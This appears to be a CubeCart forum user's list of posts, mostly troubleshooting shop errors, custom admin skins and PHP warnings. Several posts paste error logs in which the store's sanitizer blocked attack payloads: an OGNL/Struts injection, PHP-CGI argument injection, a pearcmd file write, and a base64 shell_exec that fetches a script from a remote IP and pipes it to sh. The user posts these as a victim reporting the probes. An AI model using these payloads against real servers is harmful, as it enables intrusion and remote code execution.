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Claudia last won the day on October 19 2023

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  1. [01-Oct-2024 16:12:11 America/Louisville] PHP Warning: Security Warning: Illegal array key "redirect:${#req=#context_get('co'+'m_open'+'symphony_xwo'+'rk2_disp'+'atcher_HttpSer'+'vletReq'+'uest'),#resp=#context_get('co'+'m_open'+'symphony_xwo'+'rk2_disp'+'atcher_HttpSer'+'vletRes'+'ponse'),#resp_setCharacterEncoding('UTF-8'),#resp_getWriter()_print("web"),#resp_getWriter()_print("path88888887:"),#resp_getWriter()_print(#req_getSession()_getServletContext()_getRealPath("/")),#resp_getWriter()_flush(),#resp_getWriter()_close()}" was detected and was removed. in /home/cambarga/public_html/classes/sanitize.class.php on line 121
  2. I was adding a product today and when I went to put the title and alt on the photos I clicked on the pencil in a square icon and it just showed the image. No place to put the information. It did this in the demo store too. History confirms I probably did something wrong (I have a custom filemange page) but just wanted to check. Thanks Claudia I found how to do this on the demo store. So forget it for now. Sorry
  3. I keep getting these: [16-Sep-2024 11:05:37 America/Louisville] PHP Warning: Security Warning: Illegal array key "@zdi/Powershell" was detected and was removed. in /home/xxxxx/public_html/classes/sanitize.class.php on line 121 [16-Sep-2024 13:36:19 America/Louisville] PHP Warning: Security Warning: Illegal array key "d_allow_url_include=1_d_auto_prepend_file=php://input" was detected and was removed. in /home/xxxxxx/public_html/classes/sanitize.class.php on line 121 [16-Sep-2024 13:36:19 America/Louisville] PHP Warning: Security Warning: Illegal array key "<?php_shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIHx8IHdnZXQgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIC1PLSk7IGVjaG8gIiRYIiB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA" was detected and was removed. in /home/xxxxxx/public_html/classes/sanitize.class.php on line 121 [16-Sep-2024 13:36:19 America/Louisville] PHP Warning: Security Warning: Illegal array key "d_allow_url_include=1_d_auto_prepend_file=php://input" was detected and was removed. in /home/xxxxxx/public_html/classes/sanitize.class.php on line 121 [16-Sep-2024 13:36:19 America/Louisville] PHP Warning: Security Warning: Illegal array key "<?php_shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIHx8IHdnZXQgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIC1PLSk7IGVjaG8gIiRYIiB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA" was detected and was removed. in /home/xxxxxx/public_html/classes/sanitize.class.php on line 121 [16-Sep-2024 13:39:27 America/Louisville] PHP Warning: Security Warning: Illegal array key "config-create_/" was detected and was removed. in /home/xxxxxxx/public_html/classes/sanitize.class.php on line 121 [16-Sep-2024 13:39:27 America/Louisville] PHP Warning: Security Warning: Illegal array key "/<?echo(md5("hi"));?>_/tmp/index1_php" was detected and was removed. in /home/xxxxxx/public_html/classes/sanitize.class.php on line 121 [16-Sep-2024 13:39:27 America/Louisville] PHP Warning: Security Warning: Illegal array key "config-create_/" was detected and was removed. in /home/xxxxxxx/public_html/classes/sanitize.class.php on line 121 [16-Sep-2024 13:39:27 America/Louisville] PHP Warning: Security Warning: Illegal array key "/<?echo(md5("hi"));?>_/tmp/index1_php" was detected and was removed. in /home/xxxxxxx/public_html/classes/sanitize.class.php on line 121
  4. I just wondered if a custom config file or something had to be created also should you keep the default skin uploaded? I'm wonderig because I created a new admin skin and as you know, brian, I keep getting all these errors and i thought it might be picking up something from an old skin. When I keep the name "default" I don't get all the errors.
  5. What are all the steps needed to create a custom admin skin. I think I did something wrong. Thanks in advance
  6. We had discussed line 2197 earlier. -- We did? You have a better memory than me LOL I'll try the edit above
  7. cubecart.class Line 2197 Red box with x: syntax error, unexpected "=" The only difference between stock and mine is this edit I made many versions ago starting at line 2644: $delivery = array( 'url' => $url, 'method' => $order['ship_method'], 'product' => $order['ship_product'], 'tracking' => $order['ship_tracking'], 'all_ship_date' => $order['all_ship_date'], 'venue_ship_product' => $order['venue_ship_product'], 'all_shipping_used' => $order['all_shipping_used'], 'date' => (!empty($order['ship_date']) && $order['ship_date']!=='0000-00-00') ? formatDispatchDate($order['ship_date']) : '' ); } unset($ship_class); } else { $delivery = array( 'url' => filter_var($order['ship_tracking'], FILTER_VALIDATE_URL) ? $order['ship_tracking'] : '', 'method' => $order['ship_method'], 'product' => $order['ship_product'], 'tracking' => $order['ship_tracking'], 'all_ship_date' => $order['all_ship_date'], 'venue_ship_product' => $order['venue_ship_product'], 'all_shipping_used' => $order['all_shipping_used'], 'date' => (!empty($order['ship_date']) && $order['ship_date']!=='0000-00-00') ? formatDispatchDate($order['ship_date']) : '' ); }
  8. "So, you added the debugMessage statement at line 279? Then two lines of code later it's gone? " These errors were before I did the debug? The Product Appearances was discussed via PM. I got this error after I made the edit. I checked. The edit is there I'll check my cubecart.class file
  9. It's there too: Array ( [cat_id] => 67 [cat_name] => Banks and Bells [cat_desc] => [cat_parent_id] => 0 [cat_image] => 860 [per_ship] => 0.00 [item_ship] => 0.00 [item_int_ship] => 0.00 [per_int_ship] => 0.00 [hide] => 0 [seo_meta_title] => Banks and Bells [seo_meta_description] => Buy your vintage and collectible banks and bells at low prices with fast shipping [seo_meta_keywords] => [priority] => 11 [status] => 1 [cat_hier_position] => 0 [cat_parse] => 0 ) This is my cPanel error log [01-Sep-2024 19:22:02 America/Louisville] PHP Warning: Invalid Security Token in /home/xx/public_html/classes/sanitize.class.php on line 162 [01-Sep-2024 19:22:02 America/Louisville] PHP Warning: Undefined global variable $_GET in /home/xx/public_html/includes/functions.inc.php on line 218 [01-Sep-2024 19:22:03 America/Louisville] PHP Warning: Invalid Security Token in /home/xx/public_html/classes/sanitize.class.php on line 162 [01-Sep-2024 19:22:03 America/Louisville] PHP Warning: Undefined global variable $_GET in /home/xx/public_html/includes/functions.inc.php on line 218 [01-Sep-2024 22:00:16 America/Louisville] PHP Warning: Undefined array key "cat_parse" in /home/xx/public_html/classes/catalogue.class.php on line 281 [01-Sep-2024 23:49:38 America/Louisville] PHP Warning: Undefined array key "cat_parse" in /home/xx/public_html/classes/catalogue.class.php on line 281 [02-Sep-2024 00:29:08 America/Louisville] PHP Warning: Undefined array key "product_id" in /home/xx/public_html/modules/plugins/Product_Appearances/hooks/admin.product.tabs.php on line 5 [02-Sep-2024 02:07:34 America/Louisville] PHP Warning: Undefined array key "cat_parse" in /home/xx/public_html/classes/catalogue.class.php on line 281 [02-Sep-2024 03:06:09 America/Louisville] PHP Warning: Undefined array key "cat_parse" in /home/xx/public_html/classes/catalogue.class.php on line 281 [02-Sep-2024 04:30:28 America/Louisville] PHP Warning: Undefined array key "cat_parse" in /home/xx/public_html/classes/catalogue.class.php on line 281 [02-Sep-2024 05:32:26 America/Louisville] PHP Warning: Undefined array key "cat_parse" in /home/xx/public_html/classes/catalogue.class.php on line 281 [02-Sep-2024 05:34:56 America/Louisville] PHP Warning: Security Warning: Illegal array key "@zdi/Powershell" was detected and was removed. in /home/xxx/public_html/classes/sanitize.class.php on line 121 [02-Sep-2024 12:58:32 America/Louisville] PHP Warning: Undefined array key "cart_order_id" in /home/xxx/public_html/classes/cubecart.class.php on line 2796
  10. It's there: Debug Messages: [0] Array ( [cat_id] => 22 [cat_name] => Beer and Liquor [cat_desc] => [cat_parent_id] => 0 [cat_image] => 502 [per_ship] => 0.00 [item_ship] => 0.00 [item_int_ship] => 0.00 [per_int_ship] => 0.00 [hide] => 0 [seo_meta_title] => Beer and Liquor Collectibles - CamBargainStore [seo_meta_description] => Buy all your vintage beer and liquor collectibles here. Great products at low prices. More to come! [seo_meta_keywords] => [priority] => 12 [status] => 1 [cat_hier_position] => 0 [cat_parse] => 0 )
  11. yes it is I just reuploaded the file with the stock file for 6.5.6 - and I'll see if I get any warnings. In the admin error log it says category discount table doesn't exist, but I see it has been addressed in GitHub I'll go ahead and add it
  12. Here's my code: if (isset($catData) && is_array($catData)) { if($catData['cat_parse']=='1') { $catData['cat_desc'] = $GLOBALS['smarty']->fetch('string:'.$catData['cat_desc']); } $vars['category'] = $catData;
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